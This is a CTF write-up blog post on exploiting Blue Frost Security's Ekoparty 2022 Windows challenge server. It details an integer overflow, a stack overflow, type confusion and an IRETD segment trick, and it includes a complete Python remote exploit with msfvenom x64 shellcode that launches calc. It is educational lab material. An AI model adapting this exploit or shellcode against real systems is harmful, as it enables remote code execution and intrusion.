Windows Exploitation Challenge - Blue Frost Security 2022 (Ekoparty)

Posted by: voidsec Post Date: December 1, 2022

Last month, during Ekoparty, Blue Frost Security published a Windows challenge. Since Windows exploitation challenges are rare in CTFs, and since I found this one interesting and very clever, I decided to write up my reverse engineering and exploitation methodology.

Challenge Requests

Only Python solutions without external libraries will be accepted
The goal is to execute the Windows Calculator (calc.exe)
The solution should work on Windows 10 or Windows 11
Process continuation is desirable (not mandatory)

You can download the target application here (backup).

High-Level Analysis

When exploring an unknown executable, one of the first things I always check is the security features that were built into the binary when it was compiled. On Linux I’m used to checksec.sh; on Windows I use winchecksec or PESecurity. They aren’t kept up to date, but they serve our purpose.

Running winchecksec against the target reports the following mitigations:

C:\Users\VoidSec>winchecksec.exe bfs-eko2022.exe

Architecture    : AMD64
Dynamic Base    : "Present"
ASLR            : "Present"
High Entropy VA : "NotPresent"
Force Integrity : "NotPresent"
Isolation       : "Present"
NX/DEP          : "Present"
SEH             : N/A
CFG             : "NotPresent"
RFG             : "NotPresent"
SafeSEH         : N/A
GS              : "Present"
Authenticode    : False
.NET            : False

Some of these details can also be confirmed, at runtime, with a tool like System Informer (formerly Process Hacker):

This means that we are dealing with an x64, un-obfuscated C++ binary (checked with DIE), compiled with ASLR, DEP and stack canaries (/GS) enabled but without CFG.

Once executed, the binary binds to 0.0.0.0 on port 31415 and waits for a client connection.

As per my methodology, I’ve proceeded with reverse engineering the high-level functionalities of each code block, renaming them with some meaningful labels. One thing that also helps me better visualize the code flow is colouring blocks:

Blue shades: nodes that I’m stepping through while debugging or paths followed by the software. For more complex software I generally trace the execution flow with tools like PIN, DynamoRIO and the Tenet plugin for IDA.
Green shades: blocks that I want to reach or that are holding main/interesting functionalities I’d like to explore.
Black/grey: error messages/irrelevant code sections.
Orange: possible logic vulnerabilities that I’d like to further examine.
Red: possible memory corruption vulnerabilities that I’d like to further examine.

I’ve then collapsed all irrelevant nodes, leaving me with the following simplified code graph:

Handshake

I usually combine debugging and static code analysis in order to get the most out of both. I then proceeded to write a simple Python “client” to interact with the target.

As soon as the software starts, a buffer that is always static (both in size and memory address) is allocated in the heap:

As we can see from the VirtualAlloc() API call above, the buffer is allocated at address 0x10000000 and it is of size 0x1000 (4096 bytes); the memory protection for the region is RWX.

After that comes the socket initialization and the server binding; the server then enters a loop, waiting for a client connection.
Note: the server is not multithreaded, and only one client at a time is allowed.

Data sent to the server is stored in the previously allocated heap-buffer and then a function is called. This function, which I renamed handhshake_check(), has the following prototype: handhshake_check(uint buffer_length, *buffer). Once decompiled, it results in the following code:

_BOOL8 __fastcall handhshake_check(__int64 buffer_length, const char * buffer) {
  return strncmp(buffer, Str2, 6ui64) == 0;
}

This function verifies whether the first 6 bytes of our buffer match the string “Hello” (five characters plus the terminating null byte); if they do, the execution continues and the software sends back “Hi“.
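The check can be modelled in a couple of lines of Python. This is only a sketch: it assumes Str2 holds “Hello”, and the handshake_ok() name is mine, not something taken from the binary.

```python
# Assumption: Str2 in the binary is "Hello"; with a length of 6 the
# comparison also covers the terminating NUL byte.
EXPECTED = b"Hello\x00"


def handshake_ok(buffer: bytes) -> bool:
    """Model strncmp(buffer, "Hello", 6) == 0."""
    return buffer[:6] == EXPECTED


print(handshake_ok(b"Hello\x00"))  # handshake with the NUL terminator
print(handshake_ok(b"Hello!"))     # sixth byte is not NUL
```

This is why the client has to send the null byte explicitly: the five visible characters alone are not enough.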

Data Processing

After that, the execution flow is transferred to another function, which I’ve renamed as data_processing() and decompiled as follows:

int __fastcall data_processing(SOCKET socket)
{
  int result; // eax
  int v2; // eax
  unsigned int i; // [rsp+20h] [rbp-F48h]
  unsigned int header_len; // [rsp+24h] [rbp-F44h]
  unsigned int len_0; // [rsp+24h] [rbp-F44h]
  CHAR CmdLine[3840]; // [rsp+30h] [rbp-F38h] BYREF
  char packet_type; // [rsp+F30h] [rbp-38h]
  char stack_buff[8]; // [rsp+F40h] [rbp-28h] BYREF
  char packet_type_0; // [rsp+F48h] [rbp-20h]
  unsigned __int16 packet_data_length; // [rsp+F49h] [rbp-1Fh]

  for ( i = 0; i < 0x1000; i += 16 )
  {
    *(_QWORD *)&heap_buff[i] = 0x5050505050505050i64;
    *(_QWORD *)&heap_buff[i + 8] = 0xCF58585858585858ui64;
  }
  printf(" [+] Processing request\n");
  header_len = recv(socket, stack_buff, 11, 0);
  if ( header_len == -1 )
    return printf("  [-] Client data error\n");
  if ( header_len < 11ui64 )
    return printf("  [-] Bad size\n");
  if ( *(_QWORD *)stack_buff != '2202okE' )
    return printf("  [-] Wrong cookie value\n");
  packet_type = packet_type_0;
  if ( packet_type_0 != 'T' )
    return printf("  [-] Invalid packet type\n");
  if ( (__int16)packet_data_length > 3840 )     // Integer Overflow
    return printf("  [-] Invalid packet size\n");
  len_0 = recv(socket, heap_buff, packet_data_length, 0);// writing packet_data to heap-buffer
  printf(" [+] Data received: %i bytes\n", len_0);
  char_replace(CmdLine, heap_buff, len_0);
  if ( packet_type == 'T' )
  {
    printf("  [+] Message received: %s\n", CmdLine);
    send(socket, CmdLine, len_0, 0);
  }
  else
  {
    printf("  [-] Unsupported message\n");
    v2 = strlen(Str);
    send(socket, buf, v2 + 1, 0);
  }
  result = packet_type;
  if ( packet_type == 'X' )
  {
    off_7FF720E1C000 = (__int64 (__fastcall *)(_QWORD))&heap_buff[len_0];
    return off_7FF720E1C000(CmdLine);
  }
  return result;
}

In this function:

The previously allocated heap-buffer is filled with 0x5050505050505050 and 0xCF58585858585858.
Note: this is weird, as memory is usually initialized to 0.
Another packet is expected; this time the content is saved in a stack buffer.
If the received packet is at least 11 bytes long, the function checks whether it starts with a specific “cookie value”, 0x323230326F6B45 (“Eko2022“).
Then the first byte after the “cookie value” is checked for the presence of the T character. This field is used to determine the packet’s type.
Then the 2 bytes after the packet’s type are treated as the size of the packet’s data. The packet data’s size must not exceed 0xF00 (3840 bytes).

I’ve named this structure: packet_header

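#pragma pack(push, 1)          // no padding: the header is exactly 11 bytes on the wire
struct packet_header{
    ULONGLONG cookie_value;    // 8 bytes: "Eko2022\0", compared as a QWORD
    BYTE packet_type;          // 1 byte: 'T'
    SHORT packet_data_len;     // 2 bytes: compared as a signed value
};
#pragma pack(pop)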
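On the client side, the same 11-byte layout can be produced with Python’s struct module. A minimal sketch follows; build_header() is a helper name I made up for illustration.

```python
import struct

COOKIE = b"Eko2022\x00"  # 8-byte cookie, NUL included


def build_header(packet_type: bytes, data_len: int) -> bytes:
    """Pack cookie (8 bytes), type (1 byte) and signed length (2 bytes)."""
    # "<" selects little-endian with no padding between the fields.
    return struct.pack("<8sch", COOKIE, packet_type, data_len)


header = build_header(b"T", 0x100)
print(len(header), header.hex())
```

The cookie read back as a little-endian integer is the 0x323230326F6B45 constant seen in the decompiled comparison.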

After our packet’s header passes all the above validations, the server waits for the packet’s data. This packet (packet_data) will be saved in the previously allocated heap-buffer.

`char_replace()`

Then a function renamed as char_replace() is called; this function copies the content of packet_data (stored in the heap), to a stack buffer (CmdLine) of size 0xF00 (3840 bytes). While copying the data, it replaces all the occurrences of bytes 0x2B and 0x33 with null-bytes.

__int64 __fastcall char_replace(_BYTE *CmdLine, _BYTE *heap_buffer, unsigned int size)
{
  __int64 result; // rax
  unsigned int i; // [rsp+0h] [rbp-18h]

  for ( i = 0; ; ++i )
  {
    result = size;
    if ( i >= size )
      break;
    if ( *heap_buffer == 0x2B || *heap_buffer == 0x33 )
      *CmdLine = 0;
    else
      *CmdLine = *heap_buffer;
    ++heap_buffer;
    ++CmdLine;
  }
  return result;
}

After the copy and character replacement, the resulting data is sent back to the client.
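To reason about which payload bytes survive the copy, the filter can be reproduced in Python. This is a behavioural sketch of the decompiled loop, not the original code.

```python
BAD_BYTES = (0x2B, 0x33)  # '+' and '3', the two values zeroed by the copy


def char_replace(data: bytes) -> bytes:
    """Return data as it would look in CmdLine after the filtered copy."""
    return bytes(0 if b in BAD_BYTES else b for b in data)


print(char_replace(b"1+3=4"))
```

Only the stack copy is altered; the bytes stored in the heap-buffer stay exactly as they were received.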

Chaining Vulnerabilities

Integer Overflow

The packet_data_len comparison (which IDA’s decompiler fails to visualize adequately) is odd enough to investigate. As we can see from the raw assembly:

movsx   eax, packet_data_length
cmp     eax, 0F00h
jle     short loc_7FF609B81386

The packet_data_len value is loaded into the EAX register by the MOVSX instruction.

MOVSX: copies the contents of the source operand to the destination operand and sign-extends the value. In 64-bit mode, the instruction’s default operation size is 32 bits.

JLE: It is a conditional jump that follows a test. It performs a signed comparison jump after a cmp if the destination operand is less than or equal to the source operand.

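If we send a packet_data_len of value 0xFFFF, it will be sign-extended to 0xFFFFFFFF (-1), treated as a negative value by the signed comparison and “bypass” the length check. The following recv() call, on the other hand, uses the same field as an unsigned 16-bit value, so it will accept up to 65535 bytes.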
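The two interpretations of the same two bytes can be reproduced with struct. This is a sketch of the logic only; the function names are hypothetical.

```python
import struct

MAX_LEN = 0xF00  # 3840, the limit used by the comparison


def length_check_passes(raw: bytes) -> bool:
    """Model movsx + cmp + jle: the field is compared as a signed 16-bit value."""
    (signed_len,) = struct.unpack("<h", raw)
    return signed_len <= MAX_LEN


def recv_length(raw: bytes) -> int:
    """Model the later use of the same field as an unsigned 16-bit length."""
    (unsigned_len,) = struct.unpack("<H", raw)
    return unsigned_len


field = b"\xff\xff"
print(length_check_passes(field), recv_length(field))
```

Any value with the top bit set (0x8000 to 0xFFFF) slips through the check in the same way.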

Stack-based Buffer Overflow

The preceding “Integer Overflow” directly leads to a stack-based buffer overflow: the char_replace() function copies the content of the heap-buffer (at address 0x10000000) onto the CmdLine[3840] buffer using the number of bytes actually received (len_0), which, thanks to the bypassed check on packet_header.packet_data_len, can now exceed 3840.

Before trashing the stack with our linear overflow, it is always better to check what’s interesting on it. If we inspect with a debugger what sits on the stack after the CmdLine[3840] buffer, we discover a couple of things:

Green: the content of the CmdLine buffer (filled with A’s up to its limit not to trigger the stack-based buffer overflow yet).
Blue: the content of the packet_type local variable.
Orange: the content of the packet_header buffer we’ve previously sent to the server.
Violet: the stack canary/cookie. Remember, the binary was compiled with the /GS flag and before data_processing()’s epilogue we can see a call to __security_check_cookie() function.
Red: the saved return pointer for the main() function.

Mitigations

Simply overwriting the saved return pointer is not a viable option as we’ll also end up overwriting the stack canary, causing the OS to kill the entire process.

Unfortunately, we do not have an information leak either, as the send() call responsible for echoing back the content of the CmdLine buffer does not use the packet_data_len value we control in the packet’s header but the actual size of the packet_data we’ve sent.

We should definitely come up with something different.

Type Confusion

As mentioned before, one of the interesting pieces of data left on the stack, and sitting below our buffer, is the content of the packet_type local variable. This value is later used for the type-check comparisons:

if ( packet_type == 'T' )
  {
    printf("  [+] Message received: %s\n", CmdLine);
    send(socket, CmdLine, len_0, 0);
  }
  else
  {
        [--TRUNCATED--]
  }
  result = packet_type;
  if ( packet_type == 'X' )
  {
        [--TRUNCATED--]
  }
  return result;

As we can overwrite its value (using the linear stack-based buffer overflow previously discovered), we can cause a “type confusion” and end up in the X case.
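The overwrite can be illustrated with a toy model of the stack frame. It is a simplification that only assumes what the decompiler’s frame offsets show, namely that packet_type (rsp+F30h) sits right after the 0xF00-byte CmdLine buffer (rsp+30h); everything else in the frame is ignored.

```python
CMDLINE_SIZE = 0xF00      # size of CmdLine
BAD_BYTES = (0x2B, 0x33)  # bytes zeroed by char_replace()


def packet_type_after_copy(packet_data: bytes) -> bytes:
    """Copy packet_data over a toy frame and return the packet_type byte."""
    frame = bytearray(CMDLINE_SIZE + 1)  # CmdLine followed by packet_type
    frame[CMDLINE_SIZE] = ord("T")       # value stored by the header checks
    for i, b in enumerate(packet_data[: len(frame)]):
        frame[i] = 0 if b in BAD_BYTES else b
    return bytes(frame[CMDLINE_SIZE:])


print(packet_type_after_copy(b"A" * CMDLINE_SIZE))         # fits: still 'T'
print(packet_type_after_copy(b"A" * CMDLINE_SIZE + b"X"))  # one byte over: 'X'
```

A single byte past the end of CmdLine is enough to flip the type, well before the stack canary is reached.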

Code Execution

If we successfully trigger the type confusion, the program will directly jump into the heap-buffer containing our packet_data and the data written during the heap-buffer “initialization” (0x5050505050505050 and 0xCF58585858585858).

These initialization bytes are not random, in fact, they are disassembled as:

pop     rax
pop     rax
pop     rax
pop     rax
pop     rax
pop     rax
pop     rax
iretd   
push    rax
push    rax
push    rax
push    rax
push    rax
push    rax
push    rax
push    rax

Without any further modification the software crashes with an Access Violation error on the iretd instruction.
Note: the execution flow always jumps into the heap-buffer after the bytes we control. Because of that, we can neither “bypass” nor overwrite the iretd instruction.
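The relation between the two fill constants and the listing above can be checked quickly. This sketch only uses the one-byte opcodes involved (0x50, 0x58 and 0xCF); landing_instructions() is a hypothetical helper that shows what is decoded first when execution starts at heap_buff[len_0].

```python
import struct

OPCODES = {0x50: "push rax", 0x58: "pop rax", 0xCF: "iretd"}

# The 16-byte pattern written by the initialization loop, as laid out in memory.
PATTERN = struct.pack("<QQ", 0x5050505050505050, 0xCF58585858585858)


def landing_instructions(len_0: int) -> list:
    """Instructions decoded from heap_buff[len_0] up to the end of that 16-byte block."""
    start = len_0 % 16
    return [OPCODES[b] for b in PATTERN[start:]]


print(landing_instructions(3848))  # 3840 bytes of data + 8 overflow bytes
```

With 3848 bytes sent, execution starts 8 bytes into a block, so it runs seven pop rax and then iretd, matching the top of the listing.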

If we really want to crack this challenge we should dive into the iretd instruction.

`iretd`

Looking at the x86 Instruction Set Reference:

IRETD – interrupt return double (32-bit operand size):

Returns program control from an exception or interrupt handler to a program that was interrupted by an exception, an external interrupt, or a software-generated interrupt. In Real-Address Mode, the IRET instruction performs a far return to the interrupted program. During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.

Since we control the stack, we’re only left with the task of crafting it in a way that would allow us to gain code execution.

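IRETD expects the following values on the stack (listed here from the highest address to the lowest; EIP sits on top of the stack and is popped first):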

SS
ESP
EFLAGS
CS
EIP

We can easily point EIP and ESP into the heap-buffer we control, while I took the EFLAGS value from WinDbg.

EIP: 0x10000014, the start of our heap-buffer plus 0x14 (20 bytes, the size of the five 32-bit IRETD values that precede the shellcode in our packet); used to land directly at the beginning of our shellcode.
ESP: 0x10000800, a “safe” place in the “middle” of our heap-buffer. Not at the beginning, as the shellcode sits there, and not at the end, so that stack usage cannot stray outside the boundaries of the heap-buffer region and trigger access violation errors.
EFLAGS: 0x246
SS and CS on the other hand, were more difficult…

Global Descriptor Table

SS and CS are used to index the Global Descriptor Table (GDT) which has descriptors for:

0x00: Null descriptor
0x10: Kernel code segment
0x18: Kernel data segment
0x20: User code segment
0x28: User data segment

We can explore them in a kernel-mode debugger, such as WinDbg, with the following command:

0: kd> !process 0 0 bfs-eko2022.exe
PROCESS ffffe303936d7080
    SessionId: 1  Cid: 0b38    Peb: 00dd2000  ParentCid: 0e90
    DirBase: 119c67002  ObjectTable: ffffb48eed28d5c0  HandleCount:  52.
    Image: bfs-eko2022.exe

0: kd> .process /r /P ffffe303936d7080
Implicit process is now ffffe303`936d7080
.cache forcedecodeptes done
Loading User Symbols
........
0: kd> dd @gdtr
fffff804`1645afb0  00000000 00000000 00000000 00000000
fffff804`1645afc0  00000000 00209b00 00000000 00409300
fffff804`1645afd0  0000ffff 00cffb00 0000ffff 00cff300
fffff804`1645afe0  00000000 0020fb00 00000000 00000000
fffff804`1645aff0  90000067 16008b45 fffff804 00000000
fffff804`1645b000  00003c00 0040f300 00000000 00000000
fffff804`1645b010  00000000 00000000 00000000 00000000
fffff804`1645b020  00000000 00000000 00000000 00000000

The first 32 bytes (selectors 0x00 through 0x18) are “reserved” for the kernel. For user mode, we want to use selectors 0x20 and 0x28.

However, it’s not quite that straightforward. Because each GDT descriptor is 8 bytes in size, the three least significant bits of a descriptor’s offset are always zero. Intel uses the two lowest bits of the selector to represent the Requested Privilege Level (RPL) and the third as the table indicator (GDT or LDT). The RPL bits are zero when operating in ring-0 (kernel), but as we want to move to ring-3 (user mode) we must set them to “3”.
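The raw dwords printed by dd can be decoded by hand. The sketch below follows the standard 8-byte segment descriptor layout and uses values copied from the dump above; decode_descriptor() and the dictionary keys are names I picked for illustration.

```python
def decode_descriptor(lo: int, hi: int) -> dict:
    """Decode an 8-byte segment descriptor given as two little-endian dwords."""
    access = (hi >> 8) & 0xFF  # P, DPL, S and type bits
    flags = (hi >> 20) & 0xF   # AVL, L, D/B, G
    return {
        "base": ((lo >> 16) & 0xFFFF) | ((hi & 0xFF) << 16) | (hi & 0xFF000000),
        "limit": (lo & 0xFFFF) | (hi & 0x000F0000),
        "present": bool(access & 0x80),
        "dpl": (access >> 5) & 3,
        "code": bool(access & 0x08),     # executable bit of the type field
        "long_mode": bool(flags & 0x2),  # L bit: 64-bit code segment
        "default_32": bool(flags & 0x4), # D/B bit
    }


# GDT offset -> (low dword, high dword), copied from the dd @gdtr output
GDT_ENTRIES = {
    0x20: (0x0000FFFF, 0x00CFFB00),
    0x28: (0x0000FFFF, 0x00CFF300),
    0x30: (0x00000000, 0x0020FB00),
    0x50: (0x00003C00, 0x0040F300),
}

for offset, (lo, hi) in GDT_ENTRIES.items():
    print(hex(offset), decode_descriptor(lo, hi))
```

Decoded this way, the entry at 0x20 is a ring-3 32-bit code segment, 0x30 is the ring-3 64-bit code segment, and 0x50 is a ring-3 data segment with limit 0x3c00.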

This means that our code segment selector will be (0x20 | 0x3 = 0x23), and our data segment selector will be (0x28 | 0x3 = 0x2B).
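The selector arithmetic is easy to verify in Python. A small sketch, with helper names of my own choosing:

```python
def make_selector(gdt_offset: int, rpl: int) -> int:
    """Combine a GDT byte offset (multiple of 8) with a privilege level."""
    return gdt_offset | rpl


def decode_selector(selector: int) -> dict:
    """Split a selector into descriptor index, table indicator and RPL."""
    return {
        "index": selector >> 3,     # descriptor number (8 bytes each)
        "ti": (selector >> 2) & 1,  # 0 = GDT, 1 = LDT
        "rpl": selector & 3,        # requested privilege level
    }


for offset in (0x20, 0x28):
    sel = make_selector(offset, 3)
    print(hex(sel), decode_selector(sel))
```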

Now, while the code selector poses no problem, the data selector falls among the “bad bytes” replaced by the char_replace() function.

For the stack selector, we just need to find a value whose type is Data, RW. I’ve looped through all the selectors and ended up with the value 0x53:

0: kd> dg 0x53
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0053 00000000`00000000 00000000`00003c00 Data RW Ac 3 Bg By P  Nl 000004f3

CS: 0x23 code segment selector
SS: 0x53 stack segment selector
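Putting the five values together, the frame consumed by IRETD can be built and checked against the bad bytes. This is a sketch using the values chosen above; the helper names are hypothetical.

```python
import struct

BAD_BYTES = {0x2B, 0x33}  # zeroed by char_replace() in the stack copy


def build_iretd_frame(eip: int, cs: int, eflags: int, esp: int, ss: int) -> bytes:
    """Pack the five 32-bit values in the order IRETD pops them."""
    return struct.pack("<5I", eip, cs, eflags, esp, ss)


def bad_offsets(frame: bytes) -> list:
    """Offsets of bytes that would not survive the copy onto the stack."""
    return [i for i, b in enumerate(frame) if b in BAD_BYTES]


frame = build_iretd_frame(0x10000014, 0x23, 0x246, 0x10000800, 0x53)
print(len(frame), bad_offsets(frame))
```

Swapping SS back to 0x2B makes the problem visible: the selector byte at offset 16 would be replaced with a null byte.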

Using the above settings will pivot the code execution flow up to the beginning of our shellcode but in 32-bit mode. Unfortunately, since the stack base and limit are completely messed up, as soon as we try to use the stack (e.g., PUSH EAX) the program will crash.

To properly execute our shellcode, I’ve introduced the following “prologue” at the beginning of our shellcode: JMP 0x33:0x1000001c

This “prologue” jumps a few bytes further into our shellcode and also has the nice property of letting us specify 0x33 as the new code segment, bringing us back into 64-bit mode.
Note: if you’re wondering why I’m allowed to use the 0x33 value, it is a “bad byte” only in the copy placed on the stack; we’re now executing from the heap, where it is left unaffected.
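The encoding of that far jump (opcode 0xEA followed by a 32-bit offset and a 16-bit selector) can be generated rather than typed by hand. A minimal sketch; encode_far_jmp() is a hypothetical helper, and the layout assumes the 20-byte IRETD frame sits at the very start of the heap-buffer.

```python
import struct

HEAP_BASE = 0x10000000
IRETD_FRAME_SIZE = 20  # five 32-bit values placed before the shellcode


def encode_far_jmp(selector: int, offset: int) -> bytes:
    """Encode 'JMP selector:offset' (ptr16:32 form, valid in 32-bit code only)."""
    return b"\xEA" + struct.pack("<IH", offset, selector)


prologue = encode_far_jmp(0x33, 0x1000001C)
next_insn = HEAP_BASE + IRETD_FRAME_SIZE + len(prologue)
print(prologue.hex(), hex(next_insn))
```

By this arithmetic the byte right after the jump sits at 0x1000001b, so when adjusting the shellcode (for example by enabling a leading INT3) it is worth re-checking in a debugger that the jump target still lines up with the instruction you expect.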

Since 64-bit mode doesn’t need a valid stack segment selector (it’s not used), we can finally restore the stack pointer to a meaningful value. Luckily enough, the RCX register still holds a reference to the original stack, before it was “polluted” by the IRETD instruction. We can just transfer it back into RSP with: mov rsp,rcx .

With everything restored we can execute the shellcode and finally pop calc!

Video PoC and Exploit

The complete (and commented) exploit code, IDA’s DB and target binary are available on my GitHub.

Exploit Source Code

import socket
import struct

"""
Exploit title:      Ekoparty 2022 BFS Windows Challenge
Exploit Authors:    Paolo Stagno aka VoidSec - https://voidsec.com
Grade:              PoC
Date:               20/11/2022
Tested on:          Windows 10 Pro x64 22H2 Build 19045.2251
Category:           remote exploit
Platform:           windows
"""

# msfvenom -a x64 --platform Windows -p windows/x64/exec cmd="calc" -f python -v shellcode
shellcode_x64 = b""
# shellcode_x64 += b"\xcc"  # INT3
shellcode_x64 += b"\xea\x1c\x00\x00\x10\x33\x00"  # 32-bit shellcode prologue restoring the CS value to 0x33 - JMP 0x33:0x1000001c
shellcode_x64 += b"\x48\x89\xCC"  # 64-bit shellcode prologue restoring old stack pointer - MOV RSP, RCX
# shellcode_x64 += b"\xcc"  # INT3
shellcode_x64 += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00"
shellcode_x64 += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2"
shellcode_x64 += b"\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
shellcode_x64 += b"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7"
shellcode_x64 += b"\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c"
shellcode_x64 += b"\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
shellcode_x64 += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
shellcode_x64 += b"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88"
shellcode_x64 += b"\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
shellcode_x64 += b"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49"
shellcode_x64 += b"\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34"
shellcode_x64 += b"\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
shellcode_x64 += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
shellcode_x64 += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
shellcode_x64 += b"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
shellcode_x64 += b"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49"
shellcode_x64 += b"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
shellcode_x64 += b"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
shellcode_x64 += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0"
shellcode_x64 += b"\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff"
shellcode_x64 += b"\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
shellcode_x64 += b"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00"
shellcode_x64 += b"\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0"
shellcode_x64 += b"\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
shellcode_x64 += b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80"
shellcode_x64 += b"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
shellcode_x64 += b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
shellcode_x64 += b"\x63\x00"

print("Ekoparty 2022 - BFS' Windows Challenge")
print("> Exploit by VoidSec")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("127.0.0.1", 31415))

handshake = b"Hello\x00"
print(f"[>] Sending handshake - {len(handshake)} bytes")
client.send(handshake)
resp = client.recv(3)
if resp == b"Hi\x00":
    print("[+] ACK")

    # Packet's Header
    header = b""
    header += b"Eko2022\x00"  # cookie
    header += b"T"  # packet type
    header += b"\xFF\xFF"  # packet size; leads to integer overflow
    print(f"Header size: {len(header)} bytes")

    # Packet's Data
    packet_data_size = 3840  # 0xF00
    packet_data = b""

    # IRETD STACK; switch from x64 to x32
    packet_data += struct.pack("<I", 0x10000014)  # EIP; start of our heap-buffer + offset to land into our shellcode
    packet_data += struct.pack("<I", 0x23)  # CS; selector for user mode
    packet_data += struct.pack("<I", 0x246)  # EFLAGS; taken from WinDbg
    packet_data += struct.pack("<I", 0x10000800)  # ESP; a "safe" place in the "middle" of our heap-buffer
    packet_data += struct.pack("<I", 0x53)  # SS; a value I've found while debugging. It is of type Data RW
    print(f"IRETD STACK size: {len(packet_data)} bytes")

    # SHELLCODE
    packet_data += shellcode_x64
    print(f"Shellcode size: {len(shellcode_x64)} bytes")

    packet_data += b"A" * (packet_data_size - len(packet_data))  # fill the buffer up to where we overwrite packet_type
    packet_data += b"X"  # type confusion
    packet_data += b"X" * 7  # disassembled into 'pop rax' as we must not "trash" the stack
    # print(packet_data)
    print(f"[>] Sending packet: {len(header + packet_data)} bytes")
    client.send(header + packet_data)
    resp = client.recv(20)
    if resp == b"Unsupported message\x00":
        print("[+] Type Confusion Triggered")
    else:
        print("[!] Type Confusion Error")
else:
    print("[!] Handshake Error")
client.close()